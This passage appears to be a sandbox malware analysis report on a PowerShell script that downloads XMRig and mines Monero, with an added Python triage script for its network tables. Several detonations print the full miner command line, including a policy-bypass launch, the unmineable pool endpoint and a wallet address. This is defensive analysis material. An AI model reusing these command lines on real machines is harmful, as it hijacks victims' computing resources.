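Read in order, the table shows the chain the process list implies: lookups and TLS connections to github.com and objects.githubusercontent.com (the release download), then rx.unmineable.com on 443 (the pool), with the sandbox's reverse lookups (in-addr.arpa) for each contacted address interleaved. The script below is an added example, not part of the report: it parses rows copied from the network tables on this page, rewrites the reverse lookups back to the addresses they describe, and separates payload staging, pool contact, background noise and the one direct connection that no resolution explains (138.91.171.81:80). Treating the Bing hosts as Windows background traffic, and the row order as first-seen order, are this editor's assumptions; confirm both against a clean detonation on the same platform.

```python
"""Triage of the Network table in this report.  Added example, not report code;
suffix lists are assumptions to be replaced with your own intel."""
import ipaddress

# Rows copied from this report's network tables, in the order listed.
NETWORK_TABLE = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 138.91.171.81:80 tcp
"""

POOL_SUFFIXES = ("unmineable.com",)                        # pool seen in this report
STAGING_SUFFIXES = ("github.com", "githubusercontent.com")  # where xmrig-6.21.3 was fetched
NOISE_SUFFIXES = ("bing.net", "bing.com")  # assumed OS background traffic; verify with a clean run


def parse_rows(text):
    """Return (country, ip, port, domain, proto) tuples; domain is '' when the column is empty."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 3:                  # row without a domain column
            parts.insert(2, "")
        country, dest, domain, proto = parts
        ip, _, port = dest.rpartition(":")
        rows.append((country, ip, int(port), domain, proto))
    return rows


def ptr_to_ip(name):
    """'133.108.199.185.in-addr.arpa' -> '185.199.108.133'; None for anything else."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[:-len(suffix)].split(".")
    try:
        return str(ipaddress.ip_address(".".join(reversed(octets))))
    except ValueError:
        return None


def _matches(domain, suffixes):
    return any(domain == s or domain.endswith("." + s) for s in suffixes)


def triage_network(text):
    """Bucket connections and tie reverse lookups to the connections they describe."""
    rows = parse_rows(text)
    out = {"staging": [], "pool": [], "noise": [], "other": [], "unresolved": [],
           "reverse_lookups": {}, "download_before_pool": None}
    ip_to_domain = {ip: domain for _, ip, _, domain, proto in rows if proto == "tcp" and domain}
    first_seen = {}
    for idx, (_, ip, port, domain, proto) in enumerate(rows):
        if proto == "udp" and port == 53:
            target = ptr_to_ip(domain)
            if target:                       # sandbox reverse lookup of an address it contacted
                out["reverse_lookups"][target] = ip_to_domain.get(target)
            continue                         # forward lookups add nothing beyond the tcp rows
        entry = (ip, port, domain)
        if _matches(domain, POOL_SUFFIXES):
            out["pool"].append(entry)
            first_seen.setdefault("pool", idx)
        elif _matches(domain, STAGING_SUFFIXES):
            out["staging"].append(entry)
            first_seen.setdefault("staging", idx)
        elif _matches(domain, NOISE_SUFFIXES):
            out["noise"].append(entry)
        elif not domain:
            out["unresolved"].append(entry)  # no name resolved it: check separately
        else:
            out["other"].append(entry)
    if "staging" in first_seen and "pool" in first_seen:
        out["download_before_pool"] = first_seen["staging"] < first_seen["pool"]
    return out


if __name__ == "__main__":
    for bucket, entries in triage_network(NETWORK_TABLE).items():
        print(bucket, entries)
```

The reverse-lookup mapping is what lets you say "the pool address 161.35.34.195 was resolved as rx.unmineable.com" when the forward resolution happened outside the capture window, as it did in some runs on this page where only the tcp row appears.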

Files

memory/116-0-0x00007FFD32733000-0x00007FFD32735000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_scxgnupe.dxb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/116-10-0x000001B968430000-0x000001B968452000-memory.dmp

memory/116-11-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/116-12-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/116-14-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/116-15-0x000001B9684C0000-0x000001B9684D2000-memory.dmp

memory/116-16-0x000001B9684B0000-0x000001B9684BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3380-47-0x0000022A62F40000-0x0000022A62F60000-memory.dmp

memory/3380-48-0x0000022A62F90000-0x0000022A62FB0000-memory.dmp

memory/3380-49-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/116-50-0x00007FFD32733000-0x00007FFD32735000-memory.dmp

memory/3380-51-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/116-52-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/3380-54-0x0000022A64880000-0x0000022A648A0000-memory.dmp

memory/3380-53-0x0000022A62FB0000-0x0000022A62FD0000-memory.dmp

memory/116-55-0x00007FFD32730000-0x00007FFD331F1000-memory.dmp

memory/3380-56-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-58-0x0000022A62FB0000-0x0000022A62FD0000-memory.dmp

memory/3380-57-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-59-0x0000022A64880000-0x0000022A648A0000-memory.dmp

memory/3380-60-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-61-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-62-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-63-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-64-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-65-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-66-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-67-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-68-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-69-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-70-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-71-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-72-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-73-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-74-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-75-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-76-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-77-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-78-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-79-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-80-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-81-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-82-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-83-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-84-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-85-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-86-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-87-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-88-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-89-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-90-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-91-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-92-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-93-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-94-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-95-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-96-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-97-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-98-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-99-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-100-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-101-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-102-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-103-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-104-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-105-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-106-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-107-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-108-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-109-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-110-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-111-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-112-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-113-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-114-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-115-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-116-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-117-0x00007FF673B40000-0x00007FF674773000-memory.dmp

memory/3380-118-0x00007FF673B40000-0x00007FF674773000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 06:06

Platform

win10v2004-20240508-en

Max time kernel

1791s

Max time network

1756s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; no description, indicator, process or target recorded for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

memory/216-0-0x00007FFE83653000-0x00007FFE83655000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sm0a33ck.dff.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/216-10-0x000002B5AC0F0000-0x000002B5AC112000-memory.dmp

memory/216-11-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/216-12-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/216-14-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/216-15-0x000002B5C44A0000-0x000002B5C44B2000-memory.dmp

memory/216-16-0x000002B5C4480000-0x000002B5C448A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3444-47-0x0000020BE3C60000-0x0000020BE3C80000-memory.dmp

memory/3444-48-0x0000020BE3CB0000-0x0000020BE3CD0000-memory.dmp

memory/3444-49-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/216-50-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/3444-54-0x0000020BE3DF0000-0x0000020BE3E10000-memory.dmp

memory/3444-53-0x0000020BE3DD0000-0x0000020BE3DF0000-memory.dmp

memory/216-52-0x00007FFE83653000-0x00007FFE83655000-memory.dmp

memory/3444-51-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/216-55-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/3444-56-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/216-57-0x00007FFE83650000-0x00007FFE84111000-memory.dmp

memory/3444-58-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-59-0x0000020BE3DD0000-0x0000020BE3DF0000-memory.dmp

memory/3444-60-0x0000020BE3DF0000-0x0000020BE3E10000-memory.dmp

memory/3444-61-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-62-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-63-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-64-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-65-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-66-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-67-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-68-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-69-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-70-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-71-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-72-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-73-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-74-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-75-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-76-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-77-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-78-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-79-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-80-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-81-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-82-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-83-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-84-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-85-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-86-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-87-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-88-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-89-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-90-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-91-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-92-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-93-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-94-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-95-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-96-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-97-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-98-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-99-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-100-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-101-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-102-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-103-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-104-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-105-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-106-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-107-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-108-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-109-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-110-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-111-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-112-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-113-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-114-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-115-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-116-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-117-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-118-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

memory/3444-119-0x00007FF6B9FE0000-0x00007FF6BAC13000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 05:47

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
(64 hits; no description, indicator, process or target recorded for any of them)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/3988-4-0x00007FFC29E13000-0x00007FFC29E14000-memory.dmp

memory/3988-5-0x000002B128BF0000-0x000002B128C12000-memory.dmp

memory/3988-7-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/3988-9-0x000002B141210000-0x000002B141286000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dsqsuv34.lw1.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3988-10-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/3988-25-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/3988-48-0x000002B141290000-0x000002B1412A2000-memory.dmp

memory/3988-61-0x000002B128C20000-0x000002B128C2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4760-90-0x000001D093610000-0x000001D093630000-memory.dmp

memory/4760-91-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-92-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/3988-93-0x00007FFC29E13000-0x00007FFC29E14000-memory.dmp

memory/3988-94-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/4760-95-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-96-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-97-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-98-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-99-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-100-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-101-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-102-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-103-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-104-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-105-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-106-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-107-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-108-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-109-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-110-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-111-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-112-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-113-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-114-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-115-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-116-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-117-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-118-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-119-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-120-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-121-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-122-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-123-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-124-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-125-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-126-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-127-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-128-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-129-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-130-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-131-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-132-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-133-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-134-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-135-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-136-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-137-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-138-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-139-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

memory/4760-140-0x00007FF60DCD0000-0x00007FF60E903000-memory.dmp

